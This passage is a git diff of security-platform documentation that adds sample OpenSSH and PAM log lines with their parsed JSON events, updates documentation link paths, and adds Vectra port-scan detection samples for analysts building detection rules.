parsers. I ``` +=== "connection_closed_2.json" + + ```json + + { + "message": " Connection closed by 127.0.0.1", + "event": { + "category": [ + "network" + ], + "outcome": "success", + "type": [ + "end" + ] + }, + "action": { + "name": "connection", + "outcome": "success", + "outcome_reason": "Connection closed by 127.0.0.1", + "target": "user", + "type": "close" + }, + "observer": { + "product": "openssh", + "type": "server", + "vendor": "openbsd project" + }, + "process": { + "name": "sshd" + }, + "related": { + "ip": [ + "127.0.0.1" + ] + }, + "source": { + "address": "127.0.0.1", + "ip": "127.0.0.1" + } + } + + ``` + + === "connection_closed_authenticating_user.json" ```json @@ -844,6 +989,56 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "connection_from.json" + + ```json + + { + "message": " Connection from 127.0.0.1 port 58752 on 127.0.0.1 port 22", + "event": { + "category": [ + "network" + ], + "outcome": "success", + "type": [ + "start" + ] + }, + "action": { + "name": "connection", + "outcome": "success", + "outcome_reason": "Connection from 127.0.0.1 port 58752 on 127.0.0.1 port 22", + "target": "user", + "type": "open" + }, + "destination": { + "address": "127.0.0.1", + "ip": "127.0.0.1", + "port": 22 + }, + "observer": { + "product": "openssh", + "type": "server", + "vendor": "openbsd project" + }, + "process": { + "name": "sshd" + }, + "related": { + "ip": [ + "127.0.0.1" + ] + }, + "source": { + "address": "127.0.0.1", + "ip": "127.0.0.1", + "port": 58752 + } + } + + ``` + + === "connection_reset.json" ```json @@ -1755,12 +1950,12 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` -=== "pam_more_auth_failure.json" +=== "pam_faillock_consecutive_failures.json" ```json { - "message": "PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=1.2.3.4 user=root", + "message": "pam_faillock(sshd:auth): Consecutive login failures for user JDOE account temporarily locked", "event": { "category": [ "authentication" @@ -1773,7 +1968,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "action": { "name": "sshd:auth", "outcome": "failure", - "outcome_reason": "PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=1.2.3.4 user=root", + "outcome_reason": "Consecutive login failures for user JDOE account temporarily locked", "target": "user", "type": "authentication" }, @@ -1786,51 +1981,44 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "name": "sshd" }, "related": { - "ip": [ - "1.2.3.4" - ], "user": [ - "root" + "JDOE" ] }, "source": { - "address": "1.2.3.4", - "ip": "1.2.3.4", "user": { - "name": "root" + "name": "JDOE" } }, "user": { - "euid": "0", - "id": "0", - "name": "root" + "name": "JDOE" } } ``` -=== "pam_service_ignoring_max_retries.json" +=== "pam_faillock_user_unknown.json" ```json { - "message": "PAM service(sshd) ignoring max retries; 6 > 3", + "message": "pam_faillock(sshd:auth): User unknown", "event": { "category": [ - "session" + "authentication" ], "outcome": "failure", "type": [ - "start" + "end" ] }, "action": { - "name": "connection", + "name": "sshd:auth", "outcome": "failure", - "outcome_reason": "ignoring max retries; 6 > 3", + "outcome_reason": "User unknown", "target": "user", - "type": "open" + "type": "authentication" }, "observer": { "product": "openssh", @@ -1845,27 +2033,27 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` -=== "pam_session_closed.json" +=== "pam_faulty_module.json" ```json { - "message": " pam_unix(sshd:session): session closed for user ubuntu", + "message": "PAM adding faulty module: pam_cracklib.so", "event": { "category": [ - "session" + "library" ], - "outcome": "success", + "outcome": "failure", "type": [ - "end" + "start" ] }, "action": { - "name": "sshd:session", - "outcome": "success", - "outcome_reason": "pam_unix(sshd:session): session closed for user ubuntu", - "target": "user", - "type": "close" + "outcome": "failure", + "outcome_reason": "PAM adding faulty module: pam_cracklib.so" + }, + "dll": { + "name": "pam_cracklib.so" }, "observer": { "product": "openssh", @@ -1874,46 +2062,33 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "process": { "name": "sshd" - }, - "related": { - "user": [ - "ubuntu" - ] - }, - "source": { - "user": { - "name": "ubuntu" - } - }, - "user": { - "name": "ubuntu" } } ``` -=== "pam_session_opened.json" +=== "pam_more_auth_failure.json" ```json { - "message": " pam_unix(sshd:session): session opened for user ubuntu by (uid=0)", + "message": "PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=1.2.3.4 user=root", "event": { "category": [ - "session" + "authentication" ], - "outcome": "success", + "outcome": "failure", "type": [ - "start" + "end" ] }, "action": { - "name": "sshd:session", - "outcome": "success", - "outcome_reason": "pam_unix(sshd:session): session opened for user ubuntu by (uid=0)", + "name": "sshd:auth", + "outcome": "failure", + "outcome_reason": "PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=1.2.3.4 user=root", "target": "user", - "type": "open" + "type": "authentication" }, "observer": { "product": "openssh", @@ -1924,40 +2099,213 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "name": "sshd" }, "related": { + "ip": [ + "1.2.3.4" + ], "user": [ - "ubuntu" + "root" ] }, "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", "user": { - "name": "ubuntu" + "name": "root" } }, "user": { - "name": "ubuntu" + "euid": "0", + "id": "0", + "name": "root" } } ``` -=== "pam_session_opened_2.json" +=== "pam_service_ignoring_max_retries.json" ```json { - "message": " pam_unix(sshd:session): session opened for user jdoe(uid=10357) by (uid=0)", + "message": "PAM service(sshd) ignoring max retries; 6 > 3", "event": { "category": [ "session" ], - "outcome": "success", + "outcome": "failure", "type": [ "start" ] }, "action": { - "name": "sshd:session", + "name": "connection", + "outcome": "failure", + "outcome_reason": "ignoring max retries; 6 > 3", + "target": "user", + "type": "open" + }, + "observer": { + "product": "openssh", + "type": "server", + "vendor": "openbsd project" + }, + "process": { + "name": "sshd" + } + } + + ``` + + +=== "pam_session_closed.json" + + ```json + + { + "message": " pam_unix(sshd:session): session closed for user ubuntu", + "event": { + "category": [ + "session" + ], + "outcome": "success", + "type": [ + "end" + ] + }, + "action": { + "name": "sshd:session", + "outcome": "success", + "outcome_reason": "pam_unix(sshd:session): session closed for user ubuntu", + "target": "user", + "type": "close" + }, + "observer": { + "product": "openssh", + "type": "server", + "vendor": "openbsd project" + }, + "process": { + "name": "sshd" + }, + "related": { + "user": [ + "ubuntu" + ] + }, + "source": { + "user": { + "name": "ubuntu" + } + }, + "user": { + "name": "ubuntu" + } + } + + ``` + + +=== "pam_session_failed_to_create.json" + + ```json + + { + "message": " pam_systemd(sshd:session): Failed to create session: Maximum number of sessions (8192) reached, refusing further sessions.", + "event": { + "category": [ + "session" + ], + "outcome": "failure", + "type": [ + "end" + ] + }, + "action": { + "name": "connection", + "outcome": "failure", + "outcome_reason": "Maximum number of sessions (8192) reached, refusing further sessions.", + "target": "user", + "type": "open" + }, + "observer": { + "product": "openssh", + "type": "server", + "vendor": "openbsd project" + }, + "process": { + "name": "sshd" + } + } + + ``` + + +=== "pam_session_opened.json" + + ```json + + { + "message": " pam_unix(sshd:session): session opened for user ubuntu by (uid=0)", + "event": { + "category": [ + "session" + ], + "outcome": "success", + "type": [ + "start" + ] + }, + "action": { + "name": "sshd:session", + "outcome": "success", + "outcome_reason": "pam_unix(sshd:session): session opened for user ubuntu by (uid=0)", + "target": "user", + "type": "open" + }, + "observer": { + "product": "openssh", + "type": "server", + "vendor": "openbsd project" + }, + "process": { + "name": "sshd" + }, + "related": { + "user": [ + "ubuntu" + ] + }, + "source": { + "user": { + "name": "ubuntu" + } + }, + "user": { + "name": "ubuntu" + } + } + + ``` + + +=== "pam_session_opened_2.json" + + ```json + + { + "message": " pam_unix(sshd:session): session opened for user jdoe(uid=10357) by (uid=0)", + "event": { + "category": [ + "session" + ], + "outcome": "success", + "type": [ + "start" + ] + }, + "action": { + "name": "sshd:session", "outcome": "success", "outcome_reason": "pam_unix(sshd:session): session opened for user jdoe(uid=10357) by (uid=0)", "target": "user", @@ -1991,6 +2339,42 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "pam_unable_to_dlopen.json" + + ```json + + { + "message": "PAM unable to dlopen(pam_cracklib.so): /lib/security/pam_cracklib.so: cannot open shared object file: No such file or directory", + "event": { + "category": [ + "library" + ], + "outcome": "failure", + "type": [ + "start" + ] + }, + "action": { + "outcome": "failure", + "outcome_reason": "cannot open shared object file: No such file or directory" + }, + "dll": { + "name": "pam_cracklib.so", + "path": "/lib/security/pam_cracklib.so" + }, + "observer": { + "product": "openssh", + "type": "server", + "vendor": "openbsd project" + }, + "process": { + "name": "sshd" + } + } + + ``` + + === "pam_winbind_granted_access.json" ```json @@ -2045,6 +2429,65 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "postponed_publickey.json" + + ```json + + { + "message": " Postponed publickey for star from 127.0.0.1 port 44690 ssh2 [preauth]", + "event": { + "category": [ + "authentication" + ], + "outcome": "success", + "type": [ + "start" + ] + }, + "action": { + "name": "session", + "outcome": "success", + "outcome_reason": "Postponed publickey for star from 127.0.0.1 port 44690 ssh2 [preauth]", + "target": "user", + "type": "open" + }, + "observer": { + "product": "openssh", + "type": "server", + "vendor": "openbsd project" + }, + "openssh": { + "auth": { + "method": "publickey" + } + }, + "process": { + "name": "sshd" + }, + "related": { + "ip": [ + "127.0.0.1" + ], + "user": [ + "star" + ] + }, + "source": { + "address": "127.0.0.1", + "ip": "127.0.0.1", + "port": 44690, + "user": { + "name": "star" + } + }, + "user": { + "name": "star" + } + } + + ``` + + === "received_disconnect_bye_bye.json" ```json @@ -2225,7 +2668,139 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` -=== "unable_to_negociate.json" +=== "received_disconnect_user_2.json" + + ```json + + { + "message": " Received disconnect from 127.0.0.1: 11: disconnected by user", + "event": { + "category": [ + "network" + ], + "outcome": "success", + "type": [ + "end" + ] + }, + "action": { + "name": "connection", + "outcome": "success", + "outcome_reason": "disconnected by user", + "target": "user", + "type": "close" + }, + "observer": { + "product": "openssh", + "type": "server", + "vendor": "openbsd project" + }, + "process": { + "name": "sshd" + }, + "related": { + "ip": [ + "127.0.0.1" + ] + }, + "source": { + "address": "127.0.0.1", + "ip": "127.0.0.1" + } + } + + ``` + + +=== "starting_session.json" + + ```json + + { + "message": " Starting session: command for nagios from 127.0.0.1 port 58752 id 0", + "event": { + "outcome": "success" + }, + "action": { + "outcome_reason": "Starting session: command for nagios from 127.0.0.1 port 58752 id 0" + }, + "observer": { + "product": "openssh", + "type": "server", + "vendor": "openbsd project" + }, + "process": { + "name": "sshd" + }, + "related": { + "ip": [ + "127.0.0.1" + ], + "user": [ + "nagios" + ] + }, + "source": { + "address": "127.0.0.1", + "ip": "127.0.0.1", + "port": 58752, + "user": { + "name": "nagios" + } + }, + "user": { + "name": "nagios" + } + } + + ``` + + +=== "starting_session_2.json" + + ```json + + { + "message": " Starting session: command for star from 127.0.0.1 port 44690 id 0", + "event": { + "outcome": "success" + }, + "action": { + "outcome_reason": "Starting session: command for star from 127.0.0.1 port 44690 id 0" + }, + "observer": { + "product": "openssh", + "type": "server", + "vendor": "openbsd project" + }, + "process": { + "name": "sshd" + }, + "related": { + "ip": [ + "127.0.0.1" + ], + "user": [ + "star" + ] + }, + "source": { + "address": "127.0.0.1", + "ip": "127.0.0.1", + "port": 44690, + "user": { + "name": "star" + } + }, + "user": { + "name": "star" + } + } + + ``` + + +=== "unable_to_negotiate.json" ```json @@ -2270,6 +2845,51 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "unable_to_negotiate_2.json" + + ```json + + { + "message": " Unable to negotiate with 1.2.3.4 port 5228: no matching key exchange method found. Their offer: diffie-hellman-group1-sha1,diffie-hellman-group14-sha1,diffie-hellman-group-exchange-sha1 [preauth]", + "event": { + "category": [ + "session" + ], + "outcome": "failure", + "type": [ + "end" + ] + }, + "action": { + "name": "negotiate", + "outcome": "failure", + "outcome_reason": "Unable to negotiate with 1.2.3.4 port 5228: no matching key exchange method found. Their offer: diffie-hellman-group1-sha1,diffie-hellman-group14-sha1,diffie-hellman-group-exchange-sha1 [preauth]", + "target": "user", + "type": "open" + }, + "observer": { + "product": "openssh", + "type": "server", + "vendor": "openbsd project" + }, + "process": { + "name": "sshd" + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "port": 5228 + } + } + + ``` + + === "user_not_allowed.json" ```json @@ -2323,6 +2943,55 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "user_on_pid.json" + + ```json + + { + "message": " User child is on pid 60225", + "event": { + "category": [ + "session" + ], + "outcome": "success", + "type": [ + "start" + ] + }, + "action": { + "name": "connection", + "outcome": "success", + "outcome_reason": "is on pid 60225", + "target": "user", + "type": "open" + }, + "observer": { + "product": "openssh", + "type": "server", + "vendor": "openbsd project" + }, + "process": { + "name": "sshd", + "pid": 60225 + }, + "related": { + "user": [ + "child" + ] + }, + "source": { + "user": { + "name": "child" + } + }, + "user": { + "name": "child" + } + } + + ``` + + @@ -2333,6 +3002,10 @@ The following table lists the fields that are extracted, normalized under the EC | Name | Type | Description | | ---- | ---- | ---------------------------| |`action.target` | `keyword` | | +|`destination.ip` | `ip` | IP address of the destination. | +|`destination.port` | `long` | Port of the destination. | +|`dll.name` | `keyword` | Name of the library. | +|`dll.path` | `keyword` | Full file path of the library. | |`event.category` | `keyword` | Event category. The second categorization field in the hierarchy. | |`event.outcome` | `keyword` | The outcome of the event. The lowest level categorization field in the hierarchy. | |`event.type` | `keyword` | Event type. The third categorization field in the hierarchy. | @@ -2342,6 +3015,7 @@ The following table lists the fields that are extracted, normalized under the EC |`observer.vendor` | `keyword` | Vendor name of the observer. | |`openssh.auth.method` | `keyword` | | |`process.name` | `keyword` | Process name. | +|`process.pid` | `long` | Process id. | |`source.domain` | `keyword` | The domain name of the source. | |`source.ip` | `ip` | IP address of the source. | |`source.port` | `long` | Port of the source. | diff --git a/_shared_content/operations_center/integrations/generated/b28db14b-e3a7-463e-8659-9bf0e577944f_sample.md b/_shared_content/operations_center/integrations/generated/b28db14b-e3a7-463e-8659-9bf0e577944f_sample.md index 171ff43e34..7129fe380f 100644 --- a/_shared_content/operations_center/integrations/generated/b28db14b-e3a7-463e-8659-9bf0e577944f_sample.md +++ b/_shared_content/operations_center/integrations/generated/b28db14b-e3a7-463e-8659-9bf0e577944f_sample.md @@ -44,6 +44,30 @@ In this section, you will find examples of raw logs as generated natively by the +=== "accepted_rsa" + + ``` + Accepted key RSA SHA256:3cOMdwjvSk5BnU2zs6397YpKn/SNSVSAMtsQchY8dOo found at /home/star/.ssh/authorized_keys:2 + ``` + + + +=== "accepted_rsa_2" + + ``` + Accepted key RSA SHA256:3cOMdwjvSk5BnU2zs6397YpKn/SNSVSAMtsQchY8dOo found at /usr/local/nagios/.ssh/authorized_keys:1 + ``` + + + +=== "auth_method_disabled" + + ``` + main: sshd: ssh-rsa algorithm is disabled + ``` + + + === "authentication_attempts_exceeded" ``` @@ -84,6 +108,14 @@ In this section, you will find examples of raw logs as generated natively by the +=== "connection_closed_2" + + ``` + Connection closed by 127.0.0.1 + ``` + + + === "connection_closed_authenticating_user" ``` @@ -124,6 +156,14 @@ In this section, you will find examples of raw logs as generated natively by the +=== "connection_from" + + ``` + Connection from 127.0.0.1 port 58752 on 127.0.0.1 port 22 + ``` + + + === "connection_reset" ``` @@ -276,6 +316,30 @@ In this section, you will find examples of raw logs as generated natively by the +=== "pam_faillock_consecutive_failures" + + ``` + pam_faillock(sshd:auth): Consecutive login failures for user JDOE account temporarily locked + ``` + + + +=== "pam_faillock_user_unknown" + + ``` + pam_faillock(sshd:auth): User unknown + ``` + + + +=== "pam_faulty_module" + + ``` + PAM adding faulty module: pam_cracklib.so + ``` + + + === "pam_more_auth_failure" ``` @@ -300,6 +364,14 @@ In this section, you will find examples of raw logs as generated natively by the +=== "pam_session_failed_to_create" + + ``` + pam_systemd(sshd:session): Failed to create session: Maximum number of sessions (8192) reached, refusing further sessions. + ``` + + + === "pam_session_opened" ``` @@ -316,6 +388,14 @@ In this section, you will find examples of raw logs as generated natively by the +=== "pam_unable_to_dlopen" + + ``` + PAM unable to dlopen(pam_cracklib.so): /lib/security/pam_cracklib.so: cannot open shared object file: No such file or directory + ``` + + + === "pam_winbind_granted_access" ``` @@ -324,6 +404,14 @@ In this section, you will find examples of raw logs as generated natively by the +=== "postponed_publickey" + + ``` + Postponed publickey for star from 127.0.0.1 port 44690 ssh2 [preauth] + ``` + + + === "received_disconnect_bye_bye" ``` @@ -356,7 +444,31 @@ In this section, you will find examples of raw logs as generated natively by the -=== "unable_to_negociate" +=== "received_disconnect_user_2" + + ``` + Received disconnect from 127.0.0.1: 11: disconnected by user + ``` + + + +=== "starting_session" + + ``` + Starting session: command for nagios from 127.0.0.1 port 58752 id 0 + ``` + + + +=== "starting_session_2" + + ``` + Starting session: command for star from 127.0.0.1 port 44690 id 0 + ``` + + + +=== "unable_to_negotiate" ``` Unable to negotiate with 1.2.3.4 port 27824: no matching cipher found. Their offer: aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,arcfour128,arcfour,3des-cbc,none [preauth] @@ -364,6 +476,14 @@ In this section, you will find examples of raw logs as generated natively by the +=== "unable_to_negotiate_2" + + ``` + Unable to negotiate with 1.2.3.4 port 5228: no matching key exchange method found. Their offer: diffie-hellman-group1-sha1,diffie-hellman-group14-sha1,diffie-hellman-group-exchange-sha1 [preauth] + ``` + + + === "user_not_allowed" ``` @@ -372,3 +492,11 @@ In this section, you will find examples of raw logs as generated natively by the +=== "user_on_pid" + + ``` + User child is on pid 60225 + ``` + + + diff --git a/_shared_content/operations_center/integrations/generated/b2d961ae-0f7e-400b-879a-f97be24cc02d.md b/_shared_content/operations_center/integrations/generated/b2d961ae-0f7e-400b-879a-f97be24cc02d.md index e128be21ea..56e7e664d0 100644 --- a/_shared_content/operations_center/integrations/generated/b2d961ae-0f7e-400b-879a-f97be24cc02d.md +++ b/_shared_content/operations_center/integrations/generated/b2d961ae-0f7e-400b-879a-f97be24cc02d.md @@ -29,7 +29,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "AgentAntiMalware.json" diff --git a/_shared_content/operations_center/integrations/generated/ba40ab72-1456-11ee-be56-0242ac120002.md b/_shared_content/operations_center/integrations/generated/ba40ab72-1456-11ee-be56-0242ac120002.md index 587f43f299..911bd6eb9e 100644 --- a/_shared_content/operations_center/integrations/generated/ba40ab72-1456-11ee-be56-0242ac120002.md +++ b/_shared_content/operations_center/integrations/generated/ba40ab72-1456-11ee-be56-0242ac120002.md @@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "epo_event.json" diff --git a/_shared_content/operations_center/integrations/generated/bae128bb-98c6-45f7-9763-aad3451821e5.md b/_shared_content/operations_center/integrations/generated/bae128bb-98c6-45f7-9763-aad3451821e5.md index fe21fa6cfe..43afe36c68 100644 --- a/_shared_content/operations_center/integrations/generated/bae128bb-98c6-45f7-9763-aad3451821e5.md +++ b/_shared_content/operations_center/integrations/generated/bae128bb-98c6-45f7-9763-aad3451821e5.md @@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "domain_match.json" diff --git a/_shared_content/operations_center/integrations/generated/bba2bed2-d925-440f-a0ce-dbcae04eaf26.md b/_shared_content/operations_center/integrations/generated/bba2bed2-d925-440f-a0ce-dbcae04eaf26.md index 6c5e7e030d..d7d6f946f7 100644 --- a/_shared_content/operations_center/integrations/generated/bba2bed2-d925-440f-a0ce-dbcae04eaf26.md +++ b/_shared_content/operations_center/integrations/generated/bba2bed2-d925-440f-a0ce-dbcae04eaf26.md @@ -26,7 +26,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "malcore_event.json" diff --git a/_shared_content/operations_center/integrations/generated/bd9d0f51-114e-499a-bb7a-4f2d0a518b04.md b/_shared_content/operations_center/integrations/generated/bd9d0f51-114e-499a-bb7a-4f2d0a518b04.md index 2fd79e60c9..45a6615bb6 100644 --- a/_shared_content/operations_center/integrations/generated/bd9d0f51-114e-499a-bb7a-4f2d0a518b04.md +++ b/_shared_content/operations_center/integrations/generated/bd9d0f51-114e-499a-bb7a-4f2d0a518b04.md @@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "dns_type_1.json" diff --git a/_shared_content/operations_center/integrations/generated/bf8867ee-43b7-444c-9475-a7f43754ab6d.md b/_shared_content/operations_center/integrations/generated/bf8867ee-43b7-444c-9475-a7f43754ab6d.md index 62620dd4bf..8a7c6bfc2e 100644 --- a/_shared_content/operations_center/integrations/generated/bf8867ee-43b7-444c-9475-a7f43754ab6d.md +++ b/_shared_content/operations_center/integrations/generated/bf8867ee-43b7-444c-9475-a7f43754ab6d.md @@ -17,7 +17,7 @@ The following table lists the data source offered by this integration. ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "vectra_account_scoring.json" @@ -508,6 +508,114 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "vectra_several_ports_scanned_01.json" + + ```json + + { + "message": "-: {\"ports\": \"7-9,13,21-26,37,53,79-81,88,106,110-113,119,135,139-144,179,199,389,427,443-445,465,513-515,543-544,548,554,587,631,646,873,990,993-995,1025-1029,1110,1433,1720,1723,1755,1900,2000-2001,2049,2121,2717,3000,3128,3306,3389,3986,4899,5000,5009,5051,5060,5101,5190,5357,5432,5631,5666,5800,5900,6000-6001,6646,7070,8000,8008-8009,8080-8081,8443,8888,9100,9999-10000,32768,49152-49157\", \"scans\": 100, \"successes\": 0, \"version\": \"8.5\", \"detection_id\": 85003, \"category\": \"RECONNAISSANCE\", \"severity\": 0, \"threat\": 0, \"certainty\": 0, \"d_type\": \"port_scan\", \"d_type_vname\": \"Port Scan\", \"triaged\": true, \"headend_addr\": \"1.2.3.4\", \"dvchost\": \"1.2.3.4\", \"href\": \"https://1.2.3.4/detections/85003?detail_id=2029813\", \"dd_dst_ip\": \"5.6.7.8\", \"dd_dst_port\": 0, \"dd_dst_dns\": \"\", \"dd_bytes_sent\": 0, \"dd_bytes_rcvd\": 0, \"mitre\": [\"T1046\", \"T1018\", \"T1072\"], \"host_name\": \"host\", \"host_ip\": \"3.4.5.6\", \"dd_proto\": \"tcp\", \"vectra_timestamp\": \"1721184242\"}", + "event": { + "action": "RECONNAISSANCE", + "url": "https://1.2.3.4/detections/85003?detail_id=2029813" + }, + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "port": 0 + }, + "host": { + "ip": "3.4.5.6", + "name": "host" + }, + "network": { + "protocol": "tcp" + }, + "observer": { + "ip": "1.2.3.4", + "name": "1.2.3.4", + "version": "8.5" + }, + "related": { + "ip": [ + "1.2.3.4", + "3.4.5.6", + "5.6.7.8" + ] + }, + "vectra": { + "certainty": 0, + "detection": { + "id": 85003, + "name": "Port Scan", + "ports": "7-9,13,21-26,37,53,79-81,88,106,110-113,119,135,139-144,179,199,389,427,443-445,465,513-515,543-544,548,554,587,631,646,873,990,993-995,1025-1029,1110,1433,1720,1723,1755,1900,2000-2001,2049,2121,2717,3000,3128,3306,3389,3986,4899,5000,5009,5051,5060,5101,5190,5357,5432,5631,5666,5800,5900,6000-6001,6646,7070,8000,8008-8009,8080-8081,8443,8888,9100,9999-10000,32768,49152-49157", + "scans": "100", + "successes": "0", + "type": "port_scan" + }, + "risk_score_norm": 0, + "severity": 0, + "timestamp": 1721184242, + "triaged": true + } + } + + ``` + + +=== "vectra_several_ports_scanned_02.json" + + ```json + + { + "message": "-: {\"ports\": \"7-9,13,21-26,37,53,79-81,88,106,110-113,119,135,139-144,179,199,389,427,443-445,465,513-515,543-544,548,554,587,631,646,873,990,993-995,1025-1029,1110,1433,1720,1723,1755,1900,2000-2001,2049,2121,2717,3000,3128,3306,3389,3986,4899,5000,5009,5051,5060,5101,5190,5357,5432,5631,5666,5800,5900,6000-6001,6646,7070,8000,8008-8009,8080-8081,8443,8888,9100,9999-10000,32768,49152-49157\", \"scans\": 100, \"successes\": 0, \"version\": \"8.5\", \"detection_id\": 85003, \"category\": \"RECONNAISSANCE\", \"severity\": 0, \"threat\": 0, \"certainty\": 0, \"d_type\": \"port_scan\", \"d_type_vname\": \"Port Scan\", \"triaged\": true, \"headend_addr\": \"1.2.3.4\", \"dvchost\": \"1.2.3.4\", \"href\": \"https://1.2.3.4/detections/85003?detail_id=2029784\", \"dd_dst_ip\": \"5.6.7.8\", \"dd_dst_port\": 0, \"dd_dst_dns\": \"\", \"dd_bytes_sent\": 0, \"dd_bytes_rcvd\": 0, \"mitre\": [\"T1046\", \"T1018\", \"T1072\"], \"host_name\": \"host\", \"host_ip\": \"3.4.5.6\", \"dd_proto\": \"tcp\", \"vectra_timestamp\": \"1721183706\"}", + "event": { + "action": "RECONNAISSANCE", + "url": "https://1.2.3.4/detections/85003?detail_id=2029784" + }, + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "port": 0 + }, + "host": { + "ip": "3.4.5.6", + "name": "host" + }, + "network": { + "protocol": "tcp" + }, + "observer": { + "ip": "1.2.3.4", + "name": "1.2.3.4", + "version": "8.5" + }, + "related": { + "ip": [ + "1.2.3.4", + "3.4.5.6", + "5.6.7.8" + ] + }, + "vectra": { + "certainty": 0, + "detection": { + "id": 85003, + "name": "Port Scan", + "ports": "7-9,13,21-26,37,53,79-81,88,106,110-113,119,135,139-144,179,199,389,427,443-445,465,513-515,543-544,548,554,587,631,646,873,990,993-995,1025-1029,1110,1433,1720,1723,1755,1900,2000-2001,2049,2121,2717,3000,3128,3306,3389,3986,4899,5000,5009,5051,5060,5101,5190,5357,5432,5631,5666,5800,5900,6000-6001,6646,7070,8000,8008-8009,8080-8081,8443,8888,9100,9999-10000,32768,49152-49157", + "scans": "100", + "successes": "0", + "type": "port_scan" + }, + "risk_score_norm": 0, + "severity": 0, + "timestamp": 1721183706, + "triaged": true + } + } + + ``` 